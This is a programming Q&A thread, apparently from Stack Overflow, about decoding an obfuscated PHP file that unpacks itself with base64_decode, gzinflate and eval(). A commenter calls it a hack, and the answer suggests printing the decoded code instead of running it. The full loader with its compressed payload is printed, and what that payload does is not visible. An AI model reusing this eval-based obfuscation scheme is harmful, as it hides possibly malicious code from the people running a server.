# How get the decoded contents sent to php server?

Tags: php, encoding, telegram, decoding

I have the following encoded codes! It will decode itself and run with `eval()` function, is any solution to get the decoded codes that run by server?!

```
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=c86f0c50b87a0b21633e9a7752465da7914bc8bbbZJRa8IwFIXfBf9DLGOJoO3co6NuMgbbg8wH3+Yoobm10ZiEJGXq2H9f0qpQ6dNNz739cnISRh1kDApaCZc5voeTkpBZcATPLafJCkpDJR4+9Xu8QGRQcAEZHLh1luAFZSC4hKVRTsVCbfBwiH77PYQq6fVd54Qn/fV7Xbj9eTjWpb6SEMqVPhJcOqftNEl0SU18mdQ19nA8Ja1/R+iG1ezJZS4qBjdN37tr2UQpkvCD1oxKtVm3Wuv58oPgN8GPdLW4uqj5bcZ4Zh01jtSdEKuHMh81id6nPKpVHyvzaihkMpo8PnRR8pJKCcKOZ1vF5WvzRb7wWcconSH80hgCusDfAVIHFoXAfF5U8zGEvtvHeZH4K1AqnPsZigJyl9Y+7h0c/DIYjUY4lHirN53n0qUv3k+lhaLMi+EKl0H0tsK68XRl1I4gLxXCn7tBSPvyNsAYZbLmTfwD
```

Comment: Its a simple set of `base64_decode()` sets. so if you are interested, just run the decodes. REMOVE THE `EVAL()` you dont want to run the hack by mistake

Answer (score 0):

Have you tried to do this:

```
echo base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygi ...
```

?

You should see the encoded code.